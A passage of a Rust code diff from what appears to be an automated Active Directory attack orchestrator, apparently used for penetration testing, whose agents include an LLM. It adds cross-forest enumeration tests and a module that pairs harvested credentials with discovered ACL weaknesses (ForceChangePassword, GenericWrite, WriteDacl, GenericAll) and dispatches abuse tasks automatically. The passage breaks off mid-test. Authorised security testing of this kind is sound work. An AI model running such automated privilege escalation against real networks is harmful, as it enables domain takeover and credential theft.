+ async fn collect_skips_domain_with_ten_hashes() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // 10 hashes for fabrikam
+ for i in 0..10 {
+ s.hashes
+ .push(make_hash(&format!("hashuser{i}"), "fabrikam.local"));
+ }
+ s.credentials
+ .push(make_cred("c1", "admin", "P@ssw0rd!", "contoso.local", true));
+ // pragma: allowlist secret
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ assert!(
+ work.iter().all(|w| w.domain != "fabrikam.local"),
+ "domain with >= 10 hashes should be skipped"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_credential_priority_same_domain_best() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // Cross-forest cred (priority 3)
+ s.credentials.push(make_cred(
+ "c1",
+ "crossuser",
+ "P@ssw0rd!",
+ "contoso.local",
+ false,
+ )); // pragma: allowlist secret
+ // Same-domain cred (priority 0) — should be selected
+ s.credentials.push(make_cred(
+ "c2",
+ "localuser",
+ "P@ssw0rd!",
+ "fabrikam.local",
+ false,
+ )); // pragma: allowlist secret
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ let fab_work = work.iter().find(|w| w.domain == "fabrikam.local");
+ assert!(fab_work.is_some(), "should produce work for fabrikam");
+ assert_eq!(
+ fab_work.unwrap().credential.username,
+ "localuser",
+ "same-domain credential should be preferred"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_credential_priority_admin_over_same_forest() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // Same-forest non-admin (priority 2)
+ s.credentials.push(make_cred(
+ "c1",
+ "forestuser",
+ "P@ssw0rd!",
+ "child.fabrikam.local",
+ false,
+ )); // pragma: allowlist secret
+ // Admin from another domain (priority 1) — should win
+ s.credentials.push(make_cred(
+ "c2",
+ "adminuser",
+ "P@ssw0rd!",
+ "contoso.local",
+ true,
+ )); // pragma: allowlist secret
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ let fab_work = work.iter().find(|w| w.domain == "fabrikam.local");
+ assert!(fab_work.is_some());
+ assert_eq!(
+ fab_work.unwrap().credential.username,
+ "adminuser",
+ "admin credential should be preferred over same-forest non-admin"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_credential_priority_same_forest_over_cross_forest() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // Cross-forest non-admin (priority 3)
+ s.credentials.push(make_cred(
+ "c1",
+ "crossuser",
+ "P@ssw0rd!",
+ "contoso.local",
+ false,
+ )); // pragma: allowlist secret
+ // Same-forest non-admin (priority 2) — should win
+ s.credentials.push(make_cred(
+ "c2",
+ "forestuser",
+ "P@ssw0rd!",
+ "child.fabrikam.local",
+ false,
+ )); // pragma: allowlist secret
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ let fab_work = work.iter().find(|w| w.domain == "fabrikam.local");
+ assert!(fab_work.is_some());
+ assert_eq!(
+ fab_work.unwrap().credential.username,
+ "forestuser",
+ "same-forest credential should be preferred over cross-forest"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_skips_quarantined_credentials() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // Only credential is quarantined
+ s.credentials.push(make_cred(
+ "c1",
+ "baduser",
+ "P@ssw0rd!",
+ "contoso.local",
+ true,
+ )); // pragma: allowlist secret
+ s.quarantined_credentials.insert(
+ "baduser@contoso.local".into(),
+ chrono::Utc::now() + chrono::Duration::seconds(300),
+ );
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ assert!(
+ work.iter().all(|w| w.credential.username != "baduser"),
+ "quarantined credentials should be skipped"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_skips_empty_password_credentials() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // Only credential has empty password
+ s.credentials
+ .push(make_cred("c1", "nopass", "", "contoso.local", true));
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ // No usable credential → should produce no work for fabrikam
+ assert!(
+ work.iter().all(|w| w.domain != "fabrikam.local"),
+ "empty password credentials should not produce work"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_skips_already_processed_dedup_key() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ s.credentials
+ .push(make_cred("c1", "admin", "P@ssw0rd!", "contoso.local", true)); // pragma: allowlist secret
+ // Pre-mark the dedup key as processed
+ let key = cross_forest_dedup_key("fabrikam.local", "admin", "contoso.local");
+ s.mark_processed(DEDUP_CROSS_FOREST_ENUM, key);
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ assert!(
+ work.iter().all(|w| w.domain != "fabrikam.local"),
+ "already-processed dedup key should be skipped"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_under_enumerated_flag_when_few_users() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // 2 fabrikam creds (< 3 = under-enumerated)
+ s.credentials.push(make_cred(
+ "c1",
+ "user1",
+ "P@ssw0rd!",
+ "fabrikam.local",
+ false,
+ )); // pragma: allowlist secret
+ s.credentials.push(make_cred(
+ "c2",
+ "user2",
+ "P@ssw0rd!",
+ "fabrikam.local",
+ false,
+ )); // pragma: allowlist secret
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ let fab_work = work.iter().find(|w| w.domain == "fabrikam.local");
+ assert!(fab_work.is_some());
+ assert!(
+ fab_work.unwrap().is_under_enumerated,
+ "domain with < 3 users should be marked under-enumerated"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_not_under_enumerated_with_three_users() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // 3 fabrikam creds (>= 3 = not under-enumerated, but < 5 so still triggers enum)
+ for i in 0..3 {
+ s.credentials.push(make_cred(
+ &format!("c{i}"),
+ &format!("user{i}"),
+ "P@ssw0rd!", // pragma: allowlist secret
+ "fabrikam.local",
+ false,
+ ));
+ }
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ let fab_work = work.iter().find(|w| w.domain == "fabrikam.local");
+ assert!(fab_work.is_some());
+ assert!(
+ !fab_work.unwrap().is_under_enumerated,
+ "domain with >= 3 users should not be marked under-enumerated"
+ );
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/dacl_abuse.rs b/ares-cli/src/orchestrator/automation/dacl_abuse.rs
new file mode 100644
index 00000000..dbc40d05
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/dacl_abuse.rs
@@ -0,0 +1,1192 @@
+//! auto_dacl_abuse -- direct ACL abuse for known attack paths.
+//!
+//! Unlike acl_chain_follow (which requires BloodHound to populate acl_chains),
+//! this module proactively dispatches known ACL abuse techniques when:
+//! - A credential is available for a user known to have dangerous permissions
+//! - The target object exists in the domain
+//!
+//! Covers: ForceChangePassword, GenericWrite (targeted Kerberoast), WriteDacl,
+//! WriteOwner, GenericAll. Each abuse type maps to a specific tool invocation
+//! (e.g., net rpc password for ForceChangePassword, bloodyAD for GenericWrite).
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::dedup::is_ghost_machine_account;
+use crate::orchestrator::dispatcher::{Dispatcher, SubmissionOutcome};
+use crate::orchestrator::state::*;
+
+/// Dispatches ACL abuse when matching credentials + bloodhound paths exist.
+/// Interval: 30s.
+pub async fn auto_dacl_abuse(dispatcher: Arc, mut shutdown: watch::Receiver) {
+ let mut interval = tokio::time::interval(Duration::from_secs(30));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("dacl_abuse") {
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_dacl_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "dacl_abuse",
+ "acl_type": item.vuln_type,
+ "vuln_id": item.vuln_id,
+ "source_user": item.source_user,
+ "target_user": item.target_user,
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("dacl_abuse");
+ // Mark dedup on Submitted OR Deferred to prevent the 30s tick from
+ // re-emitting identical work each cycle and bloating the deferred
+ // ZSET past its per-type cap (which silently drops entries). Only
+ // skip dedup on Dropped — those need to be reconsidered next tick.
+ let mark_dedup = match dispatcher
+ .throttled_submit_outcome("acl_chain_step", "acl", payload, priority)
+ .await
+ {
+ Ok(SubmissionOutcome::Submitted(task_id)) => {
+ info!(
+ task_id = %task_id,
+ vuln_id = %item.vuln_id,
+ acl_type = %item.vuln_type,
+ source = %item.source_user,
+ target = %item.target_user,
+ "DACL abuse dispatched"
+ );
+ true
+ }
+ Ok(SubmissionOutcome::Deferred) => {
+ debug!(vuln_id = %item.vuln_id, "DACL abuse deferred (will retry via deferred drain)");
+ true
+ }
+ Ok(SubmissionOutcome::Dropped) => {
+ debug!(vuln_id = %item.vuln_id, "DACL abuse dropped (will reconsider next tick)");
+ false
+ }
+ Err(e) => {
+ warn!(err = %e, vuln_id = %item.vuln_id, "Failed to dispatch DACL abuse");
+ false
+ }
+ };
+ if mark_dedup {
+ {
+ let mut state = dispatcher.state.write().await;
+ state.mark_processed(DEDUP_DACL_ABUSE, item.dedup_key.clone());
+ }
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_DACL_ABUSE, &item.dedup_key)
+ .await;
+ }
+ }
+ }
+}
+
+/// Collect DACL abuse work items from state without holding async locks.
+///
+/// Extracted for testability: scans `discovered_vulnerabilities` for ACL-type
+/// vulns that have a matching credential and haven't been processed yet.
+fn collect_dacl_work(state: &StateInner) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ // Check discovered_vulnerabilities for ACL-related vulns
+ // (populated by BloodHound analysis or recon agents)
+ for vuln in state.discovered_vulnerabilities.values() {
+ let vtype = vuln.vuln_type.to_lowercase();
+
+ let is_acl_vuln = vtype.contains("forcechangepassword")
+ || vtype.contains("genericwrite")
+ || vtype.contains("writedacl")
+ || vtype.contains("writeowner")
+ || vtype.contains("genericall")
+ || vtype.contains("self_membership")
+ || vtype.contains("write_membership")
+ || vtype.contains("writeproperty")
+ || vtype.contains("allextendedrights")
+ || vtype.contains("addmember")
+ || vtype.contains("addself");
+
+ if !is_acl_vuln {
+ continue;
+ }
+
+ if state.exploited_vulnerabilities.contains(&vuln.vuln_id) {
+ continue;
+ }
+
+ let dedup_key = format!("dacl:{}", vuln.vuln_id);
+ if state.is_processed(DEDUP_DACL_ABUSE, &dedup_key) {
+ continue;
+ }
+
+ let target_name = vuln
+ .details
+ .get("target")
+ .or_else(|| vuln.details.get("target_user"))
+ .or_else(|| vuln.details.get("to"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ if is_ghost_machine_account(target_name) {
+ debug!(
+ vuln_id = %vuln.vuln_id,
+ target = %target_name,
+ "Skipping ACL abuse for ghost machine account target"
+ );
+ continue;
+ }
+
+ // Extract source user from vuln details
+ let source_user = vuln
+ .details
+ .get("source")
+ .or_else(|| vuln.details.get("source_user"))
+ .or_else(|| vuln.details.get("from"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+
+ let source_domain = vuln
+ .details
+ .get("source_domain")
+ .or_else(|| vuln.details.get("domain"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+
+ if source_user.is_empty() {
+ continue;
+ }
+
+ // Find matching credential.
+ //
+ // BloodHound often emits ACL edges with SID principals (e.g. for
+ // well-known groups like Enterprise Admins). When `source` is a SID,
+ // resolve to any privileged credential in the source's domain so the
+ // ACL chain can still be exercised.
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| {
+ c.username.to_lowercase() == source_user.to_lowercase()
+ && (source_domain.is_empty()
+ || c.domain.to_lowercase() == source_domain.to_lowercase())
+ })
+ .cloned()
+ .or_else(|| resolve_sid_principal(state, source_user, source_domain));
+
+ if let Some(cred) = cred {
+ let target_user = vuln
+ .details
+ .get("target")
+ .or_else(|| vuln.details.get("target_user"))
+ .or_else(|| vuln.details.get("to"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_string();
+
+ let dc_ip = state
+ .domain_controllers
+ .get(&cred.domain.to_lowercase())
+ .cloned()
+ .unwrap_or_default();
+
+ // When BloodHound emitted the source as a raw SID and we resolved
+ // it via `resolve_sid_principal`, surface the resolved credential's
+ // SAM account name as `source_user` — not the SID. Tool schemas
+ // require a username for credential injection by `(user, domain)`,
+ // and the LLM otherwise echoes the SID as the auth principal.
+ let dispatched_source_user = if source_user.starts_with("S-1-5-21-") {
+ cred.username.clone()
+ } else {
+ source_user.to_string()
+ };
+
+ items.push(DaclWork {
+ dedup_key,
+ vuln_id: vuln.vuln_id.clone(),
+ vuln_type: vtype,
+ source_user: dispatched_source_user,
+ target_user,
+ domain: cred.domain.clone(),
+ dc_ip,
+ credential: cred,
+ });
+ }
+ }
+
+ items
+}
+
+struct DaclWork {
+ dedup_key: String,
+ vuln_id: String,
+ vuln_type: String,
+ source_user: String,
+ target_user: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+/// RIDs of well-known privileged groups whose membership is owned by privileged
+/// credentials in the same domain. Resolving a SID-typed source to "any DA-cred
+/// in this domain" is correct for these RIDs because the abuse only requires
+/// *a* member of the group, not a specific principal.
+fn is_privileged_well_known_rid(rid: u32) -> bool {
+ matches!(
+ rid,
+ 512 // Domain Admins
+ | 518 // Schema Admins
+ | 519 // Enterprise Admins
+ | 520 // Group Policy Creator Owners
+ | 526 // Key Admins
+ | 527 // Enterprise Key Admins
+ )
+}
+
+/// When the ACL edge source is a SID (typically a well-known group), resolve
+/// it to a credential of an actual member.
+///
+/// Strategy:
+/// 1. Parse `S-1-5-21-X-Y-Z-RID` and extract the domain SID prefix and RID.
+/// 2. Reverse-look up the domain via `state.domain_sids` (or fall back to
+/// `source_domain` from the vuln details).
+/// 3. For privileged well-known RIDs, return any `is_admin` credential in
+/// that domain. As a last resort, return any credential in the domain.
+fn resolve_sid_principal(
+ state: &StateInner,
+ source: &str,
+ source_domain: &str,
+) -> Option {
+ if !source.starts_with("S-1-5-21-") {
+ return None;
+ }
+ let (prefix, rid_str) = source.rsplit_once('-')?;
+ let rid: u32 = rid_str.parse().ok()?;
+
+ let resolved_domain = state
+ .domain_sids
+ .iter()
+ .find(|(_, sid)| sid.eq_ignore_ascii_case(prefix))
+ .map(|(d, _)| d.to_lowercase())
+ .or_else(|| {
+ if source_domain.is_empty() {
+ None
+ } else {
+ Some(source_domain.to_lowercase())
+ }
+ })?;
+
+ if !is_privileged_well_known_rid(rid) {
+ return None;
+ }
+
+ let admin = state
+ .credentials
+ .iter()
+ .find(|c| c.is_admin && c.domain.to_lowercase() == resolved_domain)
+ .cloned();
+ if admin.is_some() {
+ return admin;
+ }
+
+ state
+ .credentials
+ .iter()
+ .find(|c| c.domain.to_lowercase() == resolved_domain)
+ .cloned()
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("dacl:{}", "vuln-acl-001");
+ assert_eq!(key, "dacl:vuln-acl-001");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_DACL_ABUSE, "dacl_abuse");
+ }
+
+ #[test]
+ fn acl_vuln_type_matching() {
+ let positives = [
+ "ForceChangePassword",
+ "GenericWrite",
+ "WriteDacl",
+ "WriteOwner",
+ "GenericAll",
+ "self_membership",
+ "write_membership",
+ "WriteProperty",
+ "AllExtendedRights",
+ "AddMember",
+ "AddSelf",
+ "SomePrefix_forcechangepassword_suffix",
+ ];
+ for t in &positives {
+ let vtype = t.to_lowercase();
+ let is_acl_vuln = vtype.contains("forcechangepassword")
+ || vtype.contains("genericwrite")
+ || vtype.contains("writedacl")
+ || vtype.contains("writeowner")
+ || vtype.contains("genericall")
+ || vtype.contains("self_membership")
+ || vtype.contains("write_membership")
+ || vtype.contains("writeproperty")
+ || vtype.contains("allextendedrights")
+ || vtype.contains("addmember")
+ || vtype.contains("addself");
+ assert!(is_acl_vuln, "{t} should match as ACL vuln");
+ }
+ }
+
+ #[test]
+ fn non_acl_vuln_types_rejected() {
+ let negatives = [
+ "smb_signing_disabled",
+ "mssql_access",
+ "zerologon",
+ "esc1",
+ "kerberoast",
+ ];
+ for t in &negatives {
+ let vtype = t.to_lowercase();
+ let is_acl_vuln = vtype.contains("forcechangepassword")
+ || vtype.contains("genericwrite")
+ || vtype.contains("writedacl")
+ || vtype.contains("writeowner")
+ || vtype.contains("genericall")
+ || vtype.contains("self_membership")
+ || vtype.contains("write_membership");
+ assert!(!is_acl_vuln, "{t} should NOT match as ACL vuln");
+ }
+ }
+
+ #[test]
+ fn source_user_extraction_keys() {
+ // Verify the fallback chain for source user extraction
+ let details = serde_json::json!({
+ "source": "admin",
+ "source_user": "admin2",
+ "from": "admin3",
+ });
+ let source = details
+ .get("source")
+ .or_else(|| details.get("source_user"))
+ .or_else(|| details.get("from"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(source, "admin");
+
+ // Fallback to source_user
+ let details2 = serde_json::json!({
+ "source_user": "admin2",
+ });
+ let source2 = details2
+ .get("source")
+ .or_else(|| details2.get("source_user"))
+ .or_else(|| details2.get("from"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(source2, "admin2");
+
+ // No source returns empty
+ let details3 = serde_json::json!({});
+ let source3 = details3
+ .get("source")
+ .or_else(|| details3.get("source_user"))
+ .or_else(|| details3.get("from"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(source3, "");
+ }
+
+ #[test]
+ fn source_domain_extraction_keys() {
+ let details = serde_json::json!({"source_domain": "contoso.local"});
+ let source_domain = details
+ .get("source_domain")
+ .or_else(|| details.get("domain"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(source_domain, "contoso.local");
+
+ let details2 = serde_json::json!({"domain": "fabrikam.local"});
+ let source_domain2 = details2
+ .get("source_domain")
+ .or_else(|| details2.get("domain"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(source_domain2, "fabrikam.local");
+
+ let details3 = serde_json::json!({});
+ let source_domain3 = details3
+ .get("source_domain")
+ .or_else(|| details3.get("domain"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(source_domain3, "");
+ }
+
+ #[test]
+ fn target_user_extraction_keys() {
+ let details = serde_json::json!({"target": "victim", "target_user": "v2", "to": "v3"});
+ let target = details
+ .get("target")
+ .or_else(|| details.get("target_user"))
+ .or_else(|| details.get("to"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(target, "victim");
+
+ let details2 = serde_json::json!({"target_user": "v2"});
+ let target2 = details2
+ .get("target")
+ .or_else(|| details2.get("target_user"))
+ .or_else(|| details2.get("to"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(target2, "v2");
+
+ let details3 = serde_json::json!({"to": "v3"});
+ let target3 = details3
+ .get("target")
+ .or_else(|| details3.get("target_user"))
+ .or_else(|| details3.get("to"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(target3, "v3");
+ }
+
+ #[test]
+ fn ghost_machine_targets_rejected() {
+ assert!(is_ghost_machine_account("WIN-DPPJMLU3XS6$"));
+ }
+
+ #[test]
+ fn credential_matching_with_domain() {
+ let source_user = "admin";
+ let source_domain = "contoso.local";
+ let cred_username = "Admin";
+ let cred_domain = "CONTOSO.LOCAL";
+
+ let matches = cred_username.to_lowercase() == source_user.to_lowercase()
+ && (source_domain.is_empty()
+ || cred_domain.to_lowercase() == source_domain.to_lowercase());
+ assert!(matches);
+ }
+
+ #[test]
+ fn credential_matching_without_domain() {
+ let source_user = "admin";
+ let source_domain = "";
+ let cred_username = "admin";
+ let cred_domain = "contoso.local";
+
+ let matches = cred_username.to_lowercase() == source_user.to_lowercase()
+ && (source_domain.is_empty()
+ || cred_domain.to_lowercase() == source_domain.to_lowercase());
+ assert!(matches);
+ }
+
+ #[test]
+ fn credential_matching_wrong_user() {
+ let source_user = "admin";
+ let source_domain = "contoso.local";
+ let cred_username = "jdoe";
+ let cred_domain = "contoso.local";
+
+ let matches = cred_username.to_lowercase() == source_user.to_lowercase()
+ && (source_domain.is_empty()
+ || cred_domain.to_lowercase() == source_domain.to_lowercase());
+ assert!(!matches);
+ }
+
+ #[test]
+ fn credential_matching_wrong_domain() {
+ let source_user = "admin";
+ let source_domain = "contoso.local";
+ let cred_username = "admin";
+ let cred_domain = "fabrikam.local";
+
+ let matches = cred_username.to_lowercase() == source_user.to_lowercase()
+ && (source_domain.is_empty()
+ || cred_domain.to_lowercase() == source_domain.to_lowercase());
+ assert!(!matches);
+ }
+
+ #[test]
+ fn dacl_payload_structure() {
+ let payload = serde_json::json!({
+ "technique": "dacl_abuse",
+ "acl_type": "forcechangepassword",
+ "vuln_id": "vuln-acl-001",
+ "source_user": "admin",
+ "target_user": "victim",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": "admin",
+ "password": "P@ssw0rd!",
+ "domain": "contoso.local",
+ },
+ });
+ assert_eq!(payload["technique"], "dacl_abuse");
+ assert_eq!(payload["acl_type"], "forcechangepassword");
+ assert_eq!(payload["source_user"], "admin");
+ assert_eq!(payload["target_user"], "victim");
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn acl_vuln_type_case_insensitive() {
+ for t in [
+ "ForceChangePassword",
+ "FORCECHANGEPASSWORD",
+ "forcechangepassword",
+ ] {
+ let vtype = t.to_lowercase();
+ assert!(vtype.contains("forcechangepassword"), "{t} should match");
+ }
+ }
+
+ #[test]
+ fn source_user_from_key() {
+ let details = serde_json::json!({"from": "svc_account"});
+ let source = details
+ .get("source")
+ .or_else(|| details.get("source_user"))
+ .or_else(|| details.get("from"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ assert_eq!(source, "svc_account");
+ }
+
+ // -- collect_dacl_work integration tests --
+
+ use crate::orchestrator::state::SharedState;
+ use ares_core::models::{Credential, VulnerabilityInfo};
+ use std::collections::HashMap;
+
+ fn make_credential(username: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("cred-{username}"),
+ username: username.to_string(),
+ password: "P@ssw0rd!".to_string(), // pragma: allowlist secret
+ domain: domain.to_string(),
+ source: String::new(),
+ discovered_at: None,
+ is_admin: false,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_vuln(
+ vuln_id: &str,
+ vuln_type: &str,
+ details: HashMap,
+ ) -> VulnerabilityInfo {
+ VulnerabilityInfo {
+ vuln_id: vuln_id.to_string(),
+ vuln_type: vuln_type.to_string(),
+ target: "192.168.58.10".to_string(),
+ discovered_by: "bloodhound".to_string(),
+ discovered_at: chrono::Utc::now(),
+ details,
+ recommended_agent: String::new(),
+ priority: 5,
+ }
+ }
+
+ fn acl_details(source: &str, target: &str, domain: &str) -> HashMap {
+ let mut m = HashMap::new();
+ m.insert("source".to_string(), serde_json::json!(source));
+ m.insert("target".to_string(), serde_json::json!(target));
+ m.insert("source_domain".to_string(), serde_json::json!(domain));
+ m
+ }
+
+ #[tokio::test]
+ async fn collect_empty_state_no_work() {
+ let shared = SharedState::new("test".into());
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_no_credentials_no_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-001", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_forcechangepassword_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-fcp-001", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].vuln_type, "forcechangepassword");
+ assert_eq!(work[0].source_user, "admin");
+ assert_eq!(work[0].target_user, "victim");
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+
+ #[tokio::test]
+ async fn collect_genericwrite_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("svc_sql", "contoso.local"));
+ let details = acl_details("svc_sql", "targetuser", "contoso.local");
+ let vuln = make_vuln("vuln-gw-001", "GenericWrite", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].vuln_type, "genericwrite");
+ }
+
+ #[tokio::test]
+ async fn collect_writedacl_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("operator", "contoso.local"));
+ let details = acl_details("operator", "targetobj", "contoso.local");
+ let vuln = make_vuln("vuln-wd-001", "WriteDacl", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].vuln_type, "writedacl");
+ }
+
+ #[tokio::test]
+ async fn collect_writeowner_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("operator", "contoso.local"));
+ let details = acl_details("operator", "targetobj", "contoso.local");
+ let vuln = make_vuln("vuln-wo-001", "WriteOwner", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].vuln_type, "writeowner");
+ }
+
+ #[tokio::test]
+ async fn collect_genericall_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-ga-001", "GenericAll", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].vuln_type, "genericall");
+ }
+
+ #[tokio::test]
+ async fn collect_self_membership_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("user1", "contoso.local"));
+ let details = acl_details("user1", "Domain Admins", "contoso.local");
+ let vuln = make_vuln("vuln-sm-001", "self_membership", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].vuln_type, "self_membership");
+ }
+
+ #[tokio::test]
+ async fn collect_sid_source_resolves_via_domain_admin() {
+ // BloodHound emits ACL edges where the source is a SID for a
+ // well-known group (e.g. Enterprise Admins ending in -519). The
+ // resolver should pick any DA-marked credential in the same domain.
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
